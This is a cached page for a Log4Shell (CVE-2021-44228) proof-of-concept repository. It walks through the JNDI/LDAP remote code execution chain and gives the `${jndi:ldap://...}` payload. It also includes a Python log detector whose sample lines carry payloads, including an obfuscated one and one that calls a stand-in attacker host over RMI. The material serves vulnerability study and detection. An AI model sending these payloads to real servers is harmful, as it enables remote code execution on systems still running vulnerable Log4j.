
CVE-2021-44228 PoC — Apache Log4j Code Issue Vulnerability

Source
Associated Vulnerability
Title: Apache Log4j Code Issue Vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (USA). Apache Log4j has a code issue vulnerability: an attacker can craft a data request and send it to a server that uses Apache Log4j; when that request is written to the log, remote code execution is triggered.
Description
CVE-2021-44228 vulnerability study
Readme
# CVE-2021-44228 Analysis

## How does it work?

Below is a detailed walkthrough of a remote code execution case that exploits the Log4Shell vulnerability.
First, there are three parts we need to know:

1. Log4j2 allows data to be logged using a feature called **message lookup substitution**, where log messages can include data dynamically pulled from various sources (it supports JNDI lookups).

2. **JNDI Lookup**: allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services.<p align="center" ><img src="image/JNDI.jpg"></p>

3. **LDAP (Lightweight Directory Access Protocol)**: Used primarily for accessing and managing directory information services over a network.

---

Here is a simple example of Remote Code Execution:

<p align="center" ><img src="image/how.jpg" title="" alt="" data-align="center"></p>

1. The attacker sets up both an LDAP server (accessed over the LDAP protocol, holding a reference to the malicious Java class) and an HTTP server (where the malicious code is hosted)
   
   1. Set up an HTTP server in the directory that contains the compiled malicious code:<p align="center" ><img src="image/http.jpg" title="" alt="" data-align="center"></p>
   
   2. Set up an LDAP server that stores the reference:<p align="center" ><img src="image/ldap.jpg" title="" alt="ldap" data-align="center"></p>

2. The attacker sends the malicious input (`${jndi:ldap://LDAPSERVER IP:PORT/code}`) to a software system that has Log4j2 installed<p align="center" ><img src="image/software%20server.jpg" title="" alt="" data-align="center"></p>

3. Log4j2 uses the lookup feature to send a request to the LDAP server

4. The LDAP server redirects the request to the HTTP server via the Java code reference stored on the LDAP server

5. The HTTP server sends the malicious code back to the software system, which then executes it.

Malicious code:<p align="center" ><img src="image/malicious.jpg" title="" alt="" data-align="center"></p>

Executing the malicious code succeeded:

<p align="center" ><img src="image/result.jpg" title="" alt="" data-align="center"></p>

---

**IMPORTANT**:

1. LDAP is not the only way to reach remote code execution; other methods (such as RMI) work as well, as long as Log4j2 performs the message lookup substitution and executes the malicious code

2. Different Java versions can change the exploit process (here we are using Java 1.8u112).

3. It is recommended to compile the malicious code with the same Java version as the software (the server using Log4j2), or at least not a higher Java version than the software's.<p align="center" ><img src="image/version.jpg" title="" alt="" data-align="center"></p>

4. The lookup code in Log4j2:<p align="center" ><img src="image/lookup.jpg" title="" alt="" data-align="center"></p>
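The walkthrough above describes the victim side of the chain: a logged string is only dangerous once Log4j2's lookup substitution turns it into `${jndi:<scheme>://host/...}`, and as the IMPORTANT list notes the scheme may be LDAP, RMI or another JNDI provider. The following detector, an added example that is not part of this PoC repository, shows how a log-monitoring rule should therefore evaluate the nested lookup forms Log4j itself evaluates (`${lower:...}`, `${upper:...}` and the `${key:-default}` fallback) before matching, since a plain substring match on the raw line misses a message that only becomes `${jndi:...}` after substitution. The function names, the `Finding` record and the sample log lines are all constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Innermost ${...} lookup: no '$', '{' or '}' inside, so nested lookups resolve inside-out.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once it is in its plain form: ${jndi:<scheme>:[//]<host[:port]>...
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):(?://)?([^/}\s]*)", re.IGNORECASE)


@dataclass
class Finding:
    line: str          # the raw log line as received
    normalized: str    # the line after nested lookups were resolved
    scheme: str        # ldap, ldaps, rmi, dns, ...
    host: str          # host[:port] the vulnerable server would connect out to


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve the nested lookup forms Log4j's StrSubstitutor evaluates before a
    JNDI string is seen: ${lower:x}, ${upper:x} and the ${key:-default} fallback.
    Other lookups (${env:...}, ${sys:...}, ${date:...}) are left in place."""
    for _ in range(max_rounds):
        changed = False

        def resolve(match) -> str:
            nonlocal changed
            inner = match.group(1)
            key, sep, default = inner.partition(":-")
            if sep:                       # ${anything:-literal} -> literal
                changed = True
                return default
            if inner[:6].lower() == "lower:":
                changed = True
                return inner[6:].lower()
            if inner[:6].lower() == "upper:":
                changed = True
                return inner[6:].upper()
            return match.group(0)         # not a form we rewrite; keep as-is

        text = _INNERMOST.sub(resolve, text)
        if not changed:                   # nothing left to resolve
            break
    return text


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line carries a JNDI lookup, before or after normalization."""
    normalized = normalize_lookups(line)
    match = _JNDI.search(line) or _JNDI.search(normalized)
    if match is None:
        return None
    return Finding(line=line, normalized=normalized,
                   scheme=match.group(1).lower(), host=match.group(2))


def scan_lines(lines: List[str]) -> List[Finding]:
    """Scan a batch of log lines and keep only the hits."""
    return [f for f in (scan_line(l) for l in lines) if f is not None]


# Constructed sample lines (not real traffic); hosts and ports are placeholders.
SAMPLE_LOG = [
    'GET /login?user=${jndi:ldap://10.0.0.5:1389/code} HTTP/1.1',
    'User-Agent: ${jndi:rmi://attacker.example:1099/obj}',
    'X-Api-Version: ${${lower:j}ndi:ldap://10.0.0.5:1389/code}',
    'GET /health HTTP/1.1 ${sys:user.home}',
    'User-Agent: Mozilla/5.0',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"{f.scheme:5} -> {f.host:25} | {f.line}")
```

The extracted `scheme` and `host` are what an analyst needs next: the host is the outbound destination to look for in egress and DNS logs, which is the most reliable confirmation that a logged payload actually triggered the lookup rather than merely being recorded.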
File Snapshot

```
[4.0K] /data/pocs/f209dcc5e5206025f2505d7ec2a3416adac74114
├── [4.0K] http
│   ├── [ 749] exp.class
│   └── [ 288] exp.java
├── [4.0K] image
│   ├── [ 24K] how.jpg
│   ├── [ 14K] http.jpg
│   ├── [ 25K] JNDI.jpg
│   ├── [ 89K] ldap.jpg
│   ├── [106K] lookup.jpg
│   ├── [ 40K] malicious.jpg
│   ├── [ 84K] result.jpg
│   ├── [ 45K] software server.jpg
│   └── [ 24K] version.jpg
├── [1.0K] LICENSE
├── [4.0K] marshalsec
│   ├── [1.0K] LICENSE.txt
│   ├── [ 195] marshalsec.iml
│   ├── [404K] marshalsec.pdf
│   ├── [7.2K] pom.xml
│   ├── [5.5K] README.md
│   ├── [4.0K] src
│   │   ├── [4.0K] main
│   │   │   └── [4.0K] java
│   │   │       └── [4.0K] marshalsec
│   │   │           ├── [2.0K] BlazeDSAMF0.java
│   │   │           ├── [2.9K] BlazeDSAMF3AM.java
│   │   │           ├── [2.0K] BlazeDSAMF3.java
│   │   │           ├── [3.0K] BlazeDSAMFX.java
│   │   │           ├── [6.1K] BlazeDSBase.java
│   │   │           ├── [1.2K] BlazeDSExternalizableBase.java
│   │   │           ├── [2.0K] Burlap.java
│   │   │           ├── [3.8K] Castor.java
│   │   │           ├── [1.1K] EscapeType.java
│   │   │           ├── [4.0K] gadgets
│   │   │           │   ├── [1.4K] Args.java
│   │   │           │   ├── [1.7K] BindingEnumeration.java
│   │   │           │   ├── [1.8K] C3P0RefDataSource.java
│   │   │           │   ├── [3.1K] C3P0WrapperConnPool.java
│   │   │           │   ├── [1.4K] ClassFiles.java
│   │   │           │   ├── [1.9K] CommonsBeanutils.java
│   │   │           │   ├── [3.0K] CommonsConfiguration.java
│   │   │           │   ├── [1.1K] Gadget.java
│   │   │           │   ├── [2.3K] GadgetType.java
│   │   │           │   ├── [2.0K] Groovy.java
│   │   │           │   ├── [2.9K] ImageIO.java
│   │   │           │   ├── [1.5K] JdbcRowSet.java
│   │   │           │   ├── [ 14K] JDKUtil.java
│   │   │           │   ├── [1.6K] LazySearchEnumeration.java
│   │   │           │   ├── [3.8K] MockProxies.java
│   │   │           │   ├── [1.3K] Primary.java
│   │   │           │   ├── [2.5K] Resin.java
│   │   │           │   ├── [ 351] ResourceGadget.java
│   │   │           │   ├── [2.0K] Rome.java
│   │   │           │   ├── [1.5K] ScriptEngine.java
│   │   │           │   ├── [1.7K] ServiceLoader.java
│   │   │           │   ├── [1.6K] SpringAbstractBeanFactoryPointcutAdvisor.java
│   │   │           │   ├── [1.7K] SpringPartiallyComparableAdvisorHolder.java
│   │   │           │   ├── [1.9K] SpringPropertyPathFactory.java
│   │   │           │   ├── [5.8K] SpringUtil.java
│   │   │           │   ├── [1.3K] Templates.java
│   │   │           │   ├── [4.3K] TemplatesUtil.java
│   │   │           │   ├── [3.5K] ToStringUtil.java
│   │   │           │   ├── [1.8K] UnicastRefGadget.java
│   │   │           │   ├── [1.7K] UnicastRemoteObjectGadget.java
│   │   │           │   └── [2.0K] XBean.java
│   │   │           ├── [2.0K] Hessian2.java
│   │   │           ├── [4.0K] HessianBase.java
│   │   │           ├── [2.0K] Hessian.java
│   │   │           ├── [9.7K] Jackson.java
│   │   │           ├── [2.6K] Java.java
│   │   │           ├── [4.0K] jndi
│   │   │           │   ├── [4.9K] LDAPRefServer.java
│   │   │           │   └── [ 13K] RMIRefServer.java
│   │   │           ├── [4.6K] JsonIO.java
│   │   │           ├── [2.2K] JYAML.java
│   │   │           ├── [2.8K] KryoAltStrategy.java
│   │   │           ├── [2.5K] Kryo.java
│   │   │           ├── [ 11K] MarshallerBase.java
│   │   │           ├── [1.9K] Red5AMF0.java
│   │   │           ├── [1.9K] Red5AMF3.java
│   │   │           ├── [5.5K] Red5AMFBase.java
│   │   │           ├── [3.6K] SideEffectSecurityManager.java
│   │   │           ├── [7.5K] SnakeYAML.java
│   │   │           ├── [2.8K] TestingSecurityManager.java
│   │   │           ├── [4.0K] util
│   │   │           │   └── [2.5K] Reflections.java
│   │   │           ├── [2.0K] UtilFactory.java
│   │   │           ├── [3.0K] XStream.java
│   │   │           ├── [6.6K] YAMLBase.java
│   │   │           └── [2.4K] YAMLBeans.java
│   │   └── [4.0K] test
│   │       └── [4.0K] java
│   │           └── [3.6K] GadgetsTest.java
│   └── [2.6K] untitled4-1.0-SNAPSHOT.jar
├── [2.7K] README.md
└── [4.0K] target server
    └── [ 616] HelloLog.java

13 directories, 84 files
```
Shenlong Bot has cached this for you